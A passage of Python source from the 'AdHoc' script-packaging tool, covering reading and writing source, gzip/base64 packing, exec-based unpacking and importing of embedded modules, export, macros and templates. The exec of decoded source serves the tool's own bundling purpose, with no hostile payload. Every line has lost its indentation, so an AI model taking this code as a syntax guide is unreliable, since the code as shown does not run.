'''Encode source from unicode.
:param source: source string (may already be encoded).
If the ``source`` string contains a coding specification
within the first two lines, the specified coding is used,
otherwise, ``UTF-8`` is applied.
'''
# @:adhoc_run_time_section:@ on
if not source:
return ''.encode('utf-8')
if isinstance(source, cls.uc_type) and hasattr(source, 'encode'):
source = source.encode(cls.check_coding(source))
return source
@classmethod
def read_source(cls, file_, decode=True): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Read source from file.
:returns: unicode string.
:param file_: If None, empty or ``-``, sys.stdin is used,
otherwise the file is read from ``file_`` and decoded with
:meth:`decode_source`.
'''
# @:adhoc_run_time_section:@ on
source = None
if not file_ or file_ == '-':
# Python3 has a buffer attribute for binary input.
if hasattr(sys.stdin, 'buffer'):
source = sys.stdin.buffer.read()
else:
source = sys.stdin.read()
else:
try:
sf = open(file_, 'rb')
source = sf.read()
sf.close()
except IOError:
for module in sys.modules.values():
if (module
and hasattr(module, '__file__')
and module.__file__ == file_):
if (hasattr(module, '__adhoc__')
and hasattr(module.__adhoc__, 'source')):
source = module.__adhoc__.source
break
if source is None:
raise IOError('source not found for `' + str(file_) + '`')
if decode:
return cls.decode_source(source)
return source
@classmethod
def write_source(cls, file_, source, mtime=None, mode=None): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Write source to file.
:param file_: If None, empty or ``-``, sys.stdout is used,
otherwise the file is written to ``file_`` after encoding
with :meth:`encode_source`.
'''
# @:adhoc_run_time_section:@ on
esource = cls.encode_source(source)
if not file_ or file_ == '-':
# @:adhoc_run_time_section:@ off
# For Python2, sys.stdout is effectively binary, so source
# can be pre-encoded.
#
# With Python3 sys.stdout does automatic encoding (which
# is unwanted).
# Normal sys.stdout has a buffer member which allows
# binary output, but not during doctest.
# @:adhoc_run_time_section:@ on
if hasattr(sys.stdout, 'buffer'):
sys.stdout.buffer.write(esource)
else:
try:
sys.stdout.write(esource)
except TypeError:
sys.stdout.write(source)
else:
sf = open(file_, 'wb')
sf.write(esource)
sf.close()
if mode is not None:
os.chmod(file_, mode)
if mtime is not None:
import datetime
if cls.isstring(mtime):
try:
date, ms = mtime.split('.')
except ValueError:
date = mtime
ms = 0
mtime = cls.strptime(date, '%Y-%m-%dT%H:%M:%S')
mtime += datetime.timedelta(microseconds=int(ms))
if isinstance(mtime, datetime.datetime):
# @:adhoc_run_time_section:@ off
# import calendar
# if mtime.utcoffset() is not None:
# mtime = mtime - mtime.utcoffset()
# millis = int(calendar.timegm(mtime.timetuple()) * 1000 +
# mtime.microsecond / 1000)
# ts = float(millis) / 1000
# @:adhoc_run_time_section:@ on
ts = int(mtime.strftime("%s"))
else:
ts = mtime
os.utime(file_, (ts, ts))
@classmethod
def check_xfile(cls, file_, xdir=None): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Prepare extraction of a file.
:returns: None, if the file already exists. Otherwise, the
file directory is created and the absolute path name of the
file is returned.
:param file_: filename.
:param xdir: extraction directory. If it is `None`,
:attr:`extract_dir` is used.
If ``file_`` is `None`, empty or ``-``, the filename ``-`` is
returned.
If ``file_`` starts with a slash ``/``, ``xdir`` is ignored,
otherwise, ``xdir`` is prepended to ``file_``.
'''
# @:adhoc_run_time_section:@ on
if xdir is None:
xdir = cls.extract_dir
if not file_:
file_ = '-'
if file_ == '-':
return file_
file_ = os.path.expanduser(file_)
if os.path.isabs(file_):
xfile = file_
else:
xfile = os.path.join(xdir, file_)
xfile = os.path.abspath(xfile)
if os.path.exists(xfile):
# do not overwrite files
if (cls.extract_warn or (cls.verbose)) and not cls.quiet:
list(map(sys.stderr.write, (
"# xf: ", cls.__name__, ": warning file `", file_,
"` exists. skipping ...\n")))
return None
xdir = os.path.dirname(xfile)
if not os.path.exists(xdir):
os.makedirs(xdir)
return xfile
@classmethod
def pack_file(cls, source, zipped=True): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Optionally gzip a file and base64-encode it.
:returns: base64-encoded unicode string.
:param source: string to be packed.
:param zipped: if True, gzip ``source`` before
base64-encoding. (Default: True).
'''
# @:adhoc_run_time_section:@ on
import base64, gzip
if zipped:
sio = _AdHocBytesIO()
gzf = gzip.GzipFile('', 'wb', 9, sio)
gzf.write(cls.encode_source(source))
gzf.close()
source = sio.getvalue()
sio.close()
else:
source = cls.encode_source(source)
source = base64.b64encode(source)
source = source.decode('ascii')
return source
@classmethod
def unpack_file(cls, source64, zipped=True, decode=True): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Base64-decode a file and optionally ungzip it.
:returns: unicode string if ``decode`` is True.
:param source64: base64 encoded unicode string to be unpacked.
:param zipped: if True, ungzip ``source`` after
base64-decoding. (Default: True).
'''
# @:adhoc_run_time_section:@ on
import base64, gzip
# @:adhoc_run_time_section:@ off
if cls.debug:
printf(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5:>7d}[ ]{6!s}[ {7}",
dbg_comm, dbg_twid, dbg_fwid,
':DBG:', 'source64', len(source64), source64[:80],
'b64decode ...'))
# @:adhoc_run_time_section:@ on
source = source64.encode('ascii')
source = base64.b64decode(source)
if zipped:
# @:adhoc_run_time_section:@ off
if cls.debug:
printf(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5:>7d}[ ]{6!s}[ {7}",
dbg_comm, dbg_twid, dbg_fwid,
':DBG:', 'source (zip)', len(source), repr(source)[:80],
'unzipping ...'))
# @:adhoc_run_time_section:@ on
sio = _AdHocBytesIO(source)
gzf = gzip.GzipFile('', 'rb', 9, sio)
source = gzf.read()
gzf.close()
sio.close()
if decode:
source = cls.decode_source(source)
# @:adhoc_run_time_section:@ off
if cls.debug:
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5:>7d}[ ]{6!s}[",
dbg_comm, dbg_twid, dbg_fwid,
':DBG:', 'source', len(source), repr(source)[:80]))
# @:adhoc_run_time_section:@ on
return source
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Run-Time Unpack/Import Interface
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def unpack_(cls, mod_name=None, file_=None, mtime=None, # |:clm:||:api_fi:|
mode=None, zipped=True, flat=None, source64=None):
# @:adhoc_run_time_section:@ off
"""Unpack adhoc'ed file, if it does not exist."""
# @:adhoc_run_time_section:@ on
xfile = cls.check_xfile(file_, cls.extract_dir)
if xfile is None:
return
if cls.verbose:
list(map(sys.stderr.write,
("# xf: ", cls.__name__, ": unpacking `", file_, "`\n")))
source = cls.unpack_file(source64, zipped=zipped, decode=False)
cls.write_source(xfile, source, mtime, mode)
@classmethod
def strptime(cls, date_string, format_): # |:clm:|
# @:adhoc_run_time_section:@ off
"""Python 2.4 compatible"""
# @:adhoc_run_time_section:@ on
import datetime
if hasattr(datetime.datetime, 'strptime'):
strptime_ = datetime.datetime.strptime
else:
import time
strptime_ = lambda date_string, format_: (
datetime.datetime(*(time.strptime(date_string, format_)[0:6])))
return strptime_(date_string, format_)
@classmethod
def import_(cls, mod_name=None, file_=None, mtime=None, # |:clm:||:api_fi:|
mode=None, zipped=True, flat=None, source64=None):
# @:adhoc_run_time_section:@ off
"""Import adhoc'ed module."""
# @:adhoc_run_time_section:@ on
import datetime
import time
module = cls.module_setup(mod_name)
if mtime is None:
mtime = datetime.datetime.fromtimestamp(0)
else:
# mtime=2011-11-23T18:04:26[.218506], zipped=True, flat=None, source64=
try:
date, ms = mtime.split('.')
except ValueError:
date = mtime
ms = 0
mtime = cls.strptime(date, '%Y-%m-%dT%H:%M:%S')
mtime += datetime.timedelta(microseconds=int(ms))
source = cls.unpack_file(source64, zipped=zipped, decode=False)
# @:adhoc_run_time_section:@ off
# |:todo:| add to parent module
# @:adhoc_run_time_section:@ on
mod_parts = mod_name.split('.')
mod_child = mod_parts[-1]
parent = '.'.join(mod_parts[:-1])
# @:adhoc_run_time_section:@ off
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'parent', parent))
# @:adhoc_run_time_section:@ on
old_mtime = module.__adhoc__.mtime
module = cls.module_setup(mod_name, file_, mtime, source, mode)
if len(parent) > 0:
setattr(sys.modules[parent], mod_child, module)
if module.__adhoc__.mtime != old_mtime:
# @:adhoc_run_time_section:@ off
printf(sformat('{0}Executing source', dbg_comm))
# @:adhoc_run_time_section:@ on
source = cls.encode_source(module.__adhoc__.source)
exec(source, module.__dict__)
# @:adhoc_run_time_section:@ off
msg = (((mod_name in sys.modules) and ('YES')) or ('NO'))
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
mod_name + ' imported', msg))
module_name = module.__name__
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'module_name', module_name))
dump_attr(module, wid=80, trunc=5)
# @:adhoc_run_time_section:@ on
@classmethod
def module_setup(cls, module=None, file_=None, mtime=None, # |:clm:||:api_fi:|
source=None, mode=None):
# @:adhoc_run_time_section:@ off
'''Setup module for `AdHoc`.
\\|:todo:| various modes are possible:
- always use newest version (development) (currently implemented)
- always use adhoc\'ed version (freeze) (not implemented)
'''
# @:adhoc_run_time_section:@ on
m = 'ms: '
class Attr: # |:cls:|
pass
import types, datetime, os
if not isinstance(module, types.ModuleType):
mod_name = module
if mod_name is None:
mod_name = __name__
try:
if mod_name not in sys.modules:
# @:adhoc_run_time_section:@ off
if cls.verbose:
printe(sformat('{0}{1}__import__({2})',
dbg_comm, m, mod_name))
# @:adhoc_run_time_section:@ on
__import__(mod_name)
module = sys.modules[mod_name]
except (ImportError, KeyError):
# @:adhoc_run_time_section:@ off
if cls.verbose:
printe(sformat('{0}{1}imp.new_module({2})',
dbg_comm, m, mod_name))
# @:adhoc_run_time_section:@ on
import imp
module = imp.new_module(mod_name)
sys.modules[mod_name] = module
else:
mod_name = module.__name__
if mtime is None:
if (file_ is not None
or source is not None):
# the info is marked as outdated
mtime = datetime.datetime.fromtimestamp(1)
else:
# the info is marked as very outdated
mtime = datetime.datetime.fromtimestamp(0)
if not hasattr(module, '__adhoc__'):
adhoc = Attr()
setattr(module, '__adhoc__', adhoc)
setattr(adhoc, '__module__', module)
mtime_set = None
mode_set = mode
if hasattr(module, '__file__'):
module_file = module.__file__
if module_file.endswith('.pyc'):
module_file = module_file[:-1]
if os.access(module_file, os.R_OK):
stat = os.stat(module_file)
mtime_set = datetime.datetime.fromtimestamp(
stat.st_mtime)
mode_set = stat.st_mode
if mtime_set is None:
# the info is marked as very outdated
mtime_set = datetime.datetime.fromtimestamp(0)
adhoc.mtime = mtime_set
adhoc.mode = mode_set
else:
adhoc = module.__adhoc__
if (mtime > adhoc.mtime
or not hasattr(module, '__file__')):
if file_ is not None:
setattr(module, '__file__', file_)
if os.access(file_, os.R_OK): # |:api_fi:|
stat = os.stat(file_)
adhoc.mtime = datetime.datetime.fromtimestamp(
stat.st_mtime)
adhoc.mode = stat.st_mode
if adhoc.mtime > mtime:
# the file on disk is newer than the adhoc'ed source
try:
delattr(adhoc, 'source')
except AttributeError:
pass
source = None
if (mtime > adhoc.mtime
or not hasattr(adhoc, 'source')):
if source is not None:
adhoc.source = source
adhoc.mtime = mtime
adhoc.mode = mode
if not hasattr(adhoc, 'source'):
try:
file_ = module.__file__
file_, source = cls.std_source_param(file_, source)
adhoc.source = source
except (AttributeError, IOError):
# @:adhoc_run_time_section:@ off
# if hasattr(module, '__path__'): # |:debug:|
# list(map(sys.stderr.write,
# ('module path: ', module.__path__, '\n')))
# else:
# sys.stderr.write('no module.__path__\n')
# list(map(sys.stderr.write,
# [''.join((attr, str(value), "\n")) for attr, value in
# filter(lambda i: i[0] != '__builtins__',
# sorted(vars(module).items()))]))
if cls.verbose:
(t, e, tb) = sys.exc_info()
import traceback
printe(''.join(traceback.format_tb(tb)), end='')
printe(sformat('{0}: {1}', t.__name__, e))
del(tb)
# @:adhoc_run_time_section:@ on
pass
return module
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Export Tools
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def std_source_param(cls, file_=None, source=None): # |:clm:||:api_fi:|
# @:adhoc_run_time_section:@ off
'''Setup standard source parameters.
:returns: tuple ``( file_, source )``
:param file_: If None, `__file__` is used. If it ends with
``.pyc``, it is transformed to ``.py``.
:param source: If None, the result of :meth:`read_source` is
used.
'''
# @:adhoc_run_time_section:@ on
if file_ is None:
file_ = __file__
if file_.endswith('.pyc'):
file_ = file_[:-1]
if source is None:
source = cls.read_source(file_)
return (file_, source)
@classmethod
def export_source(cls, string, no_remove=False, no_disable=False): # |:clm:|
# @:adhoc_run_time_section:@ off
'''
============================ =========================
check for |adhoc_remove| sections and remove them!
check for |adhoc_import| sections and remove them!
check for |adhoc_unpack| sections and remove them!
check for |adhoc_template_v| sections and remove them!
check for |adhoc_disable| sections and enable them!
check for |adhoc_enable| sections and disable them!
check for |adhoc_remove_| section markers and rename them!
============================ =========================
'''
# @:adhoc_run_time_section:@ on
string = cls.collapse_macros(string)
if not no_remove:
string = cls.remove_sections(string, 'adhoc_remove')
string = cls.remove_sections(string, 'adhoc_import')
string = cls.remove_sections(string, 'adhoc_unpack')
string = cls.remove_sections(string, 'adhoc_template_v')
if not no_disable:
string = cls.enable_sections(string, 'adhoc_disable')
string = cls.disable_sections(string, 'adhoc_enable')
if not no_remove:
string = cls.section_tag_rename(string, 'adhoc_remove_', 'adhoc_remove')
return string
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Extract Interface
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def unpack(cls, file_=None, source=None): # |:clm:|
# @:adhoc_run_time_section:@ off
"""Unpack all adhoc'ed files in |adhoc_unpack| sections."""
# @:adhoc_run_time_section:@ on
file_, source = cls.std_source_param(file_, source)
source_sections, unpack_sections = cls.tag_partition(
source, cls.section_tag('adhoc_unpack'))
sv_extract_warn = cls.extract_warn
cls.extract_warn = True
unpack_call = ''.join((cls.__name__, '.unpack_'))
for unpack_section in unpack_sections:
unpack_section = re.sub('^\\s+', '', unpack_section)
unpack_section = re.sub(
'^[^(]*(?s)', unpack_call, unpack_section)
try:
#RtAdHoc = cls # unpack_call takes care of this
exec(unpack_section.lstrip(), globals(), locals())
except IndentationError:
sys.stderr.write("!!! IndentationError !!!\n")
# @:adhoc_run_time_section:@ off
sys.stderr.write(''.join((unpack_section, "\n")))
# @:adhoc_run_time_section:@ on
cls.extract_warn = sv_extract_warn
@classmethod
def extract(cls, file_=None, source=None): # |:clm:|
# @:adhoc_run_time_section:@ off
"""Unpack all adhoc'ed files in |adhoc_unpack| sections and
extract all templates."""
# @:adhoc_run_time_section:@ on
cls.unpack(file_, source)
cls.extract_templates(file_, source, export=True)
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Export Interface
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def export__(cls, mod_name=None, file_=None, mtime=None, # |:clm:||:api_fi:|
mode=None, zipped=True, flat=None, source64=None):
source = cls.unpack_file(source64, zipped=zipped, decode=False)
# @:adhoc_run_time_section:@ off
if cls.debug:
sys.stderr.write(
''.join(("# xp: ", cls.__name__, ".export__ for `",
file_, "`\n")))
# @:adhoc_run_time_section:@ on
if file_ is None:
return
file_base = os.path.basename(file_)
if file_base.startswith('__init__.py'):
is_init = True
else:
is_init = False
parts = mod_name.split('.')
base = parts.pop()
if parts:
module_dir = os.path.join(*parts)
cls.export_need_init[module_dir] = True
else:
module_dir = ''
if is_init:
module_dir = os.path.join(module_dir, base)
cls.export_have_init[module_dir] = True
module_file = os.path.join(module_dir, file_base)
cls.export_(source, module_file, mtime, mode, flat)
@classmethod
def export_(cls, source, file_, mtime, mode, flat=None): # |:clm:|
cflat = cls.flat
if flat is None:
flat = cflat
cls.flat = flat
if not flat:
# extract to export directory
sv_extract_dir = cls.extract_dir
cls.extract_dir = cls.export_dir
cls.extract(file_, source)
cls.extract_dir = sv_extract_dir
source_sections, import_sections = cls.tag_partition(
source, cls.section_tag('adhoc_import'))
source = cls.export_source(''.join(source_sections))
export_call = ''.join((cls.__name__, '.export__'))
xfile = cls.check_xfile(file_, cls.export_dir)
if xfile is not None:
cls.write_source(xfile, source, mtime, mode)
if cls.verbose:
list(map(sys.stderr.write,
("# xp: ", cls.__name__, ".export_ for `", file_,
"` using `", export_call,"`\n")))
for import_section in import_sections:
# this calls RtAdHoc.export__
import_section = re.sub('^\\s+', '', import_section)
import_section = re.sub(
'^[^(]*(?s)', export_call, import_section)
try:
#RtAdHoc = cls # export_call takes care of this
exec(import_section, globals(), locals())
except IndentationError:
sys.stderr.write("!!! IndentationError !!!\n")
# @:adhoc_run_time_section:@ off
sys.stderr.write(''.join((import_section, "\n")))
# @:adhoc_run_time_section:@ on
else:
xfile = cls.check_xfile(file_, cls.export_dir)
if xfile is not None:
cls.write_source(xfile, source, mtime, mode)
if cls.verbose:
list(map(sys.stderr.write,
("# xp: ", cls.__name__, ".export_ for `", file_,
"` using `", export_call,"`\n")))
cls.flat = cflat
# @:adhoc_run_time_section:@ off
default_engine = False
# @:adhoc_run_time_section:@ on
@classmethod
def export(cls, file_=None, source=None): # |:clm:|
file_, source = cls.std_source_param(file_, source)
# @:adhoc_run_time_section:@ off
# |:todo:| this chaos needs cleanup (cls.import_/cls.export__)
# @:adhoc_run_time_section:@ on
sv_import = cls.import_
cls.import_ = cls.export__
file_ = os.path.basename(file_)
# @:adhoc_run_time_section:@ off
if cls.verbose:
list(map(sys.stderr.write,
("# xp: ", cls.__name__, ".export for `", file_, "`\n")))
# @:adhoc_run_time_section:@ on
cls.export_(source, file_, None, None, False)
sv_extract_dir = cls.extract_dir
cls.extract_dir = cls.export_dir
engine_tag = cls.section_tag('adhoc_run_time_engine')
engine_source = cls.export_source(
source, no_remove=True, no_disable=True)
engine_source = cls.get_named_template(
None, file_, engine_source, tag=engine_tag, ignore_mark=True)
# @:adhoc_run_time_section:@ off
if cls.default_engine and not engine_source:
state = cls.set_delimiters(('@:', ':@'))
ah = cls()
engine_source = ah.prepare_run_time_section()
engine_source = cls.get_named_template(
None, file_, engine_source, tag=engine_tag, ignore_mark=True)
cls.reset_delimiters(state)
# @:adhoc_run_time_section:@ on
if engine_source:
efile = cls.check_xfile('rt_adhoc.py')
if efile is not None:
cls.write_source(efile, engine_source)
cls.extract_dir = sv_extract_dir
for init_dir in cls.export_need_init:
if not cls.export_have_init[init_dir]:
if cls.verbose:
list(map(sys.stderr.write,
("# xp: create __init__.py in `", init_dir, "`\n")))
inf = open(os.path.join(
cls.export_dir, init_dir, '__init__.py'), 'w')
inf.write('')
inf.close()
cls.import_ = sv_import
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Dump Interface (Import/Unpack Substitute)
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def dump__(cls, mod_name=None, file_=None, mtime=None, # |:clm:||:api_fi:|
mode=None, zipped=True, flat=None, source64=None):
if cls.verbose:
list(map(sys.stderr.write,
("# xf: ", cls.__name__, ": dumping `", file_, "`\n")))
source = cls.unpack_file(source64, zipped=zipped, decode=False)
return source
@classmethod
def dump_(cls, dump_section, dump_type=None): # |:clm:|
if dump_type is None:
dump_type = 'adhoc_import'
if not dump_section:
return ''
dump_call = ''.join(('unpacked = ', cls.__name__, '.dump__'))
dump_section = re.sub('^\\s+', '', dump_section)
dump_section = re.sub(
'^[^(]*(?s)', dump_call, dump_section)
dump_dict = {'unpacked': ''}
try:
#RtAdHoc = cls # dump_call takes care of this
exec(dump_section.lstrip(), globals(), dump_dict)
except IndentationError:
sys.stderr.write("!!! IndentationError !!!\n")
# @:adhoc_run_time_section:@ off
sys.stderr.write(''.join((dump_section, "\n")))
# @:adhoc_run_time_section:@ on
return dump_dict['unpacked']
@classmethod
def dump_file(cls, match, file_=None, source=None, tag=None, # |:clm:|
is_re=False):
file_, source = cls.std_source_param(file_, source)
if tag is None:
tag = cls.section_tag('(adhoc_import|adhoc_update)', is_re=True)
is_re = True
source_sections, dump_sections = cls.tag_partition(
source, tag, is_re, headline=True)
dump_call = ''.join((cls.__name__, '.dump_'))
for dump_section in dump_sections:
tagged_line = dump_section[0]
dump_section = dump_section[1]
tag_arg = cls.section_tag_strip(tagged_line)
check_match = match
if tag_arg != match and not match.startswith('-'):
check_match = ''.join(('-', match))
if tag_arg != match and not match.startswith('!'):
check_match = ''.join(('!', match))
if tag_arg != match:
continue
dump_section = re.sub('^\\s+', '', dump_section)
dump_section = re.sub(
'^[^(]*(?s)', dump_call, dump_section)
try:
#RtAdHoc = cls # dump_call takes care of this
exec(dump_section.lstrip(), globals(), locals())
except IndentationError:
sys.stderr.write("!!! IndentationError !!!\n")
# @:adhoc_run_time_section:@ off
sys.stderr.write(''.join((dump_section, "\n")))
# @:adhoc_run_time_section:@ on
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Macros
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
macro_call_delimiters = ('@|:', ':|>')
# @:adhoc_run_time_section:@ off
"""Macro delimiters"""
# @:adhoc_run_time_section:@ on
macro_xdef_delimiters = ('<|:', ':|@')
# @:adhoc_run_time_section:@ off
"""Macro expansion delimiters"""
# @:adhoc_run_time_section:@ on
macros = {}
# @:adhoc_run_time_section:@ off
"""Macros"""
# @:adhoc_run_time_section:@ on
@classmethod
def expand_macros(cls, source, macro_call_dlm=None, macro_xdef_dlm=None): # |:clm:|
# @:adhoc_run_time_section:@ off
"""
>>> AdHoc.macros['uc_descr_end'] = (
... '# o:' 'adhoc_template:>\\n'
... '# <:' 'adhoc_uncomment:>\\n'
... )
>>> macro_source = '# ' + AdHoc.adhoc_tag('uc_descr_end', AdHoc.macro_call_delimiters) + '\\n'
>>> ign = sys.stdout.write(macro_source) #doctest: +ELLIPSIS
# @|:uc_descr_end...:|>
>>> ign = sys.stdout.write(AdHoc.expand_macros(macro_source)) #doctest: +ELLIPSIS
# <|:adhoc_macro_call...:|@
# @|:uc_descr_end...:|>
# <|:adhoc_macro_call...:|@
# <|:adhoc_macro_expansion...:|@
# o:adhoc_template...:>
# <:adhoc_uncomment...:>
# <|:adhoc_macro_expansion...:|@
"""
# @:adhoc_run_time_section:@ on
if macro_call_dlm is None:
macro_call_dlm = cls.macro_call_delimiters
if macro_xdef_dlm is None:
macro_xdef_dlm = cls.macro_xdef_delimiters
import re
for macro_name, macro_expansion in cls.macros.items():
macro_tag = cls.adhoc_tag(macro_name, macro_call_dlm, False)
macro_tag_rx = cls.adhoc_tag(macro_name, macro_call_dlm, True)
macro_call = ''.join(('# ', macro_tag, '\n'))
macro_call_rx = ''.join(('^[^\n]*', macro_tag_rx, '[^\n]*\n'))
mc_tag = ''.join(('# ', cls.adhoc_tag('adhoc_macro_call', macro_xdef_dlm, False), "\n"))
mx_tag = ''.join(('# ', cls.adhoc_tag('adhoc_macro_expansion', macro_xdef_dlm, False), "\n"))
xdef = ''.join((
mc_tag,
macro_call,
mc_tag,
mx_tag,
macro_expansion,
mx_tag,
))
rx = re.compile(macro_call_rx, re.M)
source = rx.sub(xdef, source)
return source
@classmethod
def has_expanded_macros(cls, source, macro_xdef_dlm=None): # |:clm:|
# @:adhoc_run_time_section:@ off
"""
"""
# @:adhoc_run_time_section:@ on
if macro_xdef_dlm is None:
macro_xdef_dlm = cls.macro_xdef_delimiters
mx_tag = cls.adhoc_tag('adhoc_macro_expansion', macro_xdef_dlm, False)
me_count = len(cls.tag_lines(source, mx_tag))
return me_count > 0
@classmethod
def activate_macros(cls, source, macro_call_dlm=None, macro_xdef_dlm=None): # |:clm:|
# @:adhoc_run_time_section:@ off
"""
"""
# @:adhoc_run_time_section:@ on
if macro_xdef_dlm is None:
macro_xdef_dlm = cls.macro_xdef_delimiters
if not cls.has_expanded_macros(source, macro_xdef_dlm):
source = cls.expand_macros(source, macro_call_dlm, macro_xdef_dlm)
sv = cls.set_delimiters (macro_xdef_dlm)
source = cls.remove_sections(source, 'adhoc_macro_call')
source = cls.section_tag_remove(source, 'adhoc_macro_expansion')
cls.reset_delimiters(sv)
return source
@classmethod
def collapse_macros(cls, source, macro_xdef_dlm=None): # |:clm:|
# @:adhoc_run_time_section:@ off
"""
"""
# @:adhoc_run_time_section:@ on
if macro_xdef_dlm is None:
macro_xdef_dlm = cls.macro_xdef_delimiters
if cls.has_expanded_macros(source, macro_xdef_dlm):
sv = cls.set_delimiters (macro_xdef_dlm)
source = cls.section_tag_remove(source, 'adhoc_macro_call')
source = cls.remove_sections(source, 'adhoc_macro_expansion')
cls.reset_delimiters(sv)
return source
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Template Interface
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
@classmethod
def std_template_param(cls, file_=None, source=None, # |:clm:|
tag=None, is_re=False, all_=False):
# @:adhoc_run_time_section:@ off
'''Setup standard template parameters.
:param tag: If None, section tag `adhoc_template(_v)?` is
used.
See :meth:`std_source_param` for `file_` and `source`.
'''
# @:adhoc_run_time_section:@ on
file_, source = cls.std_source_param(file_, source)
if tag is None:
is_re=True
if all_:
tag = cls.section_tag('adhoc_(template(_v)?|import|unpack)', is_re=is_re)
else:
tag = cls.section_tag('adhoc_template(_v)?', is_re=is_re)
source = cls.activate_macros(source)
return (file_, source, tag, is_re)
@classmethod
def get_templates(cls, file_=None, source=None, # |:clm:|
tag=None, is_re=False,
ignore_mark=False, all_=False):
# @:adhoc_run_time_section:@ off
'''Extract templates matching section tag.
:param ignore_mark: If True, all templates are mapped to
standard output name ``-``.
:param tag: If None, `adhoc_template` is used.
'''
# @:adhoc_run_time_section:@ on
file_, source, tag, is_re = cls.std_template_param(
file_, source, tag, is_re, all_)
source = cls.enable_sections(source, 'adhoc_uncomment')
source = cls.indent_sections(source, 'adhoc_indent')
source_sections, template_sections = cls.tag_partition(
source, tag, is_re=is_re, headline=True)
templates = {}
for template_section in template_sections:
tagged_line = template_section[0]
section = template_section[1]
tag, tag_arg = cls.section_tag_parse(tagged_line)
if not tag_arg:
tag_arg = '-'
if tag_arg in cls.template_process_hooks:
section = cls.template_process_hooks[tag_arg](cls, section, tag, tag_arg)
if ignore_mark:
tag_arg = '-'
if tag_arg not in templates:
templates[tag_arg] = [[section], tag]
else:
templates[tag_arg][0].append(section)
if all_:
result = dict([(m, (''.join(t[0]), t[1])) for m, t in templates.items()])
else:
result = dict([(m, ''.join(t[0])) for m, t in templates.items()])
return result
@classmethod
def template_list(cls, file_=None, source=None, # |:clm:|
tag=None, is_re=False, all_=False):
# @:adhoc_run_time_section:@ off
"""Sorted list of templates.
See :meth:`std_template_param` for `file_`, `source`, `tag`, `is_re`.
.. @:adhoc_disable:@
>>> for tpl in AdHoc.template_list():
... printf(tpl)
-
README.txt
-adhoc_init
-catch-stdout
-col-param-closure
doc/USE_CASES.txt
doc/index.rst
-max-width-class
-rst-to-ascii
-test
>>> for tpl in AdHoc.template_list(all_=True):
... printf(strclean(tpl))
('-', 'adhoc_template')
('README.txt', 'adhoc_template')
('-adhoc_init', 'adhoc_template')
('-catch-stdout', 'adhoc_template')
('-col-param-closure', 'adhoc_template')
('doc/USE_CASES.txt', 'adhoc_template')
('doc/index.rst', 'adhoc_template')
('-max-width-class', 'adhoc_template')
('-rst-to-ascii', 'adhoc_template')
('-test', 'adhoc_template')
.. @:adhoc_disable:@
"""
# @:adhoc_run_time_section:@ on
file_, source, tag, is_re = cls.std_template_param(
file_, source, tag, is_re, all_)
templates = cls.get_templates(file_, source, tag, is_re, all_=all_)
if all_:
templates.update([(k, ('', v)) for k, v in cls.extra_templates])
result = list(sorted(
[(k, v[1]) for k, v in templates.items()],
key=lambda kt: '||'.join((
kt[1],
(((not (kt[0].startswith('-') or kt[0].startswith('!')))
and (kt[0]))
or (kt[0][1:]))))))
else:
templates.update(filter(
lambda tdef: (tdef[1] == 'adhoc_template'
or tdef[1] == 'adhoc_template_v'),
cls.extra_templates))
result = list(sorted(
templates.keys(),
key=lambda kt: '||'.join((
(((not (kt.startswith('-') or kt.startswith('!')))
and (kt)) or (kt[1:]))))))
return result
# @:adhoc_run_time_section:@ off
# @:adhoc_template:@ -col-param-closure
# @:adhoc_run_time_section:@ on
@classmethod
def col_param_closure(cls): # |:clm:|
# @:adhoc_run_time_section:@ off
'''Closure for setting up maximum width, padding and separator
for table columns.
:returns: a setter and a getter function for calculating the
maximum width of a list of strings (e.g. a table column).
>>> set_, get_ = AdHoc.col_param_closure()
>>> i = set_("string")
>>> get_()
[6, ' ', '======']
>>> i = set_("str")
>>> get_()
[6, ' ', '======']
>>> i = set_("longer string")
>>> get_()
[13, ' ', '=============']
>>> table_in = """\\
... Column1 Column2
... some text text
... some-more-text text text
... something text
... less"""
A splitter and column parameters depending on column count:
>>> col_count = 2
>>> splitter = lambda line: line.split(' ', col_count-1)
>>> col_params = [AdHoc.col_param_closure() for i in range(col_count)]
Generic table processor:
>>> process_cols = lambda cols: [
... col_params[indx][0](col) for indx, col in enumerate(cols)]
>>> table = [process_cols(cols) for cols in
... [splitter(line) for line in table_in.splitlines()]]
Generic table output parameters/functions:
>>> mws = [cp[1]()[0] for cp in col_params]
>>> sep = ' '.join([cp[1]()[2] for cp in col_params])
>>> paddings = [cp[1]()[1] for cp in col_params]
>>> pad_cols_c = lambda cols: [
... (((paddings[indx] is None) and (col))
... or ((paddings[indx][:int((mws[indx]-len(col))/2)]
... + col + paddings[indx])[:mws[indx]]))
... for indx, col in enumerate(cols)]
>>> pad_cols = lambda cols: [
... (((paddings[indx] is None) and (col))
... or ((col + paddings[indx])[:mws[indx]]))
... for indx, col in enumerate(cols)]
